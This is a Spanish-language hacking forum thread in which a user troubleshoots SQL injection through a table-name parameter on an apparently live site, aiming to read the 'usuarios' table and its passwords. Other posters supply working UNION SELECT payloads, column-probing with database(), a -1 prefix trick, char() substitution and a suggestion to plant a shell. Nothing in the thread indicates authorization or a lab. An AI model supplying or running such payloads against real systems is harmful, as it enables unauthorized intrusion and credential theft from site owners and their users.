 Autor
|
Tema: MySQL Problemas con inyección en el nombre de la tabla (Leído 10,726 veces)
|
PaPeRrO
 Desconectado
Mensajes: 549
You Are Being Monitored
|
trato de pensarrrrr xD,dios como quema esto, eso si estoy aprendiendo no sabeis cuanto. no hay nada mejor como pensar jaja
si la sentencia es
select nombre from <inyeccion> order by hoy DESC LIMIT 0, 4
en el momento que meto un AND la cosa peta. pero si meto UNION si puedo meterle cosas.
si pongo en la inyeccion:
order by hoy DESC LIMIT 0, 4 /*
funciona y se ven los resultados
si pudiese meter AND pondria
AND (SELECT length(pass) FROM usuarios where usuario=invitado) = 8
asi comprobaria que la contraseña tiene 8 caracteres (i n v i t a d o)
pero como hago esto si cada vez que meto un AND peta?uf!
si meto order by hoy DESC LIMIT 0, 4 AND 1=1 /*
dice
MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'and 1=1 /* order by hoy DESC LIMIT 0, 4' at line 1
y si no puedo meter and, como compruebo esto:
(SELECT length(pass) FROM usuarios where usuario=invitado) = 8
o lo que necesite comprobar?
|
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
no puedes meter un AND porque no estas dentro de un WHERE.. no es un blind, porque al parecer si te regresa los datos, es muy probable que puedas generar una bonita tabla con usuario:password si haces bien las cosas.
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
PaPeRrO
Desconectado
Mensajes: 549
You Are Being Monitored
|
si esque me falta mucho sql por saber. menos mal que el año que viene tendre una asginatura sobre ello.bueno ahora hare unas cuantas pruebas
|
|
|
|
|
En línea
|
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
podrias hacer in insert elect nombre from obranueva order by hoy DESC LIMITA 0,4; (INSERT); /* order by hoy DESC LIMIT 0, 4 Del mismo modo, en lugar de meter usuarios podes meterle una shell ñ_ñ |
|
|
|
|
En línea
|
|
|
|
sirdarckcat
Aspirante a supervillano
Moderador
Desconectado
Mensajes: 7.029
No estoy loco, soy mentalmente divergente
|
eso no siempre se puede hacer azielito  .. solo en sistemas no-mysql SELECT * FROM users;(INSERT INTO users VALUES (1,2,3)) Regresa: De hecho es muy raro que se pueda, requires que el sistema encargado de hacer las consultas separe las queries individualmente antes de hacer las peticiones. |
|
|
|
|
En línea
|
|
|
|
Azielito
no es
Colaborador
Desconectado
Mensajes: 9.188
>.<
|
entiendo '_'
*_*
|
|
|
|
|
En línea
|
|
|
|
PaPeRrO
Desconectado
Mensajes: 549
You Are Being Monitored
|
huelo la miel pero no puedo tocarla. cada vez que meto un parentesis me da un error, por ejemplo intento dar con el numero de entradas que tiene la tabla usuarios de esta manera UNION SELECT MIN(usuario),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios WHERE (SELECT Count(*) FROM usuarios) < 1000 /* y me da este error MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT Count(*) FROM usuarios) < 1000 /* order by hoy DESC LIMI siempre que meto un parentesis antes de un select para hacer la comprobacion me da error. que estoy haciendo mal? lo intento hacer como en el manual de blind sql inyection de ka0x PDF ---> http://www.milw0rm.com/papers/197esto esta mal? WHERE (SELECT Count(*) FROM usuarios) < 1000 /* |
|
|
|
|
En línea
|
|
|
|
ChElAnO
Desconectado
Mensajes: 129
|
hola, tambien podrias probar llamando a la funcionar char() en vez de poner el caracter ')' directamente. busca su numero asci poniendo -- ya no me da ningun error.
obranueva UNION SELECT 1,1,1,1,1,1,1,1,1,1,1,1 FROM usuarios -- si dices que eso ya funciona, entonces prueba hasta que encuentres cual es el campo mostrado en el html, asi: obranueva UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios -- obranueva UNION SELECT 1,database(),1,1,1,1,1,1,1,1,1,1 FROM usuarios -- obranueva UNION SELECT 1,1,database(),1,1,1,1,1,1,1,1,1 FROM usuarios -- . ... hasta que muestre la base de datos que estas utilizando. Luego, sabras en que posicion debes poner username o password, para que te lo muestre. Algo más, intenta hacer la inyeccion -1 UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios -- o algo asi, para que no haga un merge de los 2 selects, y sólo muestre el tuyo, saludos
|
|
|
|
|
En línea
|
|
|
|
PaPeRrO
Desconectado
Mensajes: 549
You Are Being Monitored
|
obranueva UNION SELECT database(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
lo de database() no lo entiendo. que se supone que tengo que meter ahi? el nombre de el campo??
es decir:
obranueva UNION SELECT usuario(),1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
asi?
al meter el -1 me da error sera que tengo que cerrar un parentesis o algo de la primera consulta?
como quedaria lo del char?
CHAR(40) SELECT length(pass) FROM usuarios where usuario=invitado CHAR(41)
da error
MySQL Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT length(pass) FROM usuarios where usuario=invitado CHAR(4
algo pasa con la primera consulta, yo normalmente no la termino y no me muestra nada, pero no me da error,, ahora estoy intentando terminarla y luego añadir algo mas para que asi se muestre el contenido.
si pongo
obranueva order by hoy DESC LIMIT 0, 4 /* se ve el contenido perfectamente
pero si pongo
obranueva order by hoy DESC LIMIT 0, 4
obranueva order by hoy DESC LIMIT 0, 4 UNION SELECT usuario,1,1,1,1,1,1,1,1,1,1,1 FROM usuarios --
me dice MySQL Error: Wrong usage of UNION and ORDER BY
¿?¿?¿?
|
|
|
|
|
En línea
|
|
|
|
|
 |
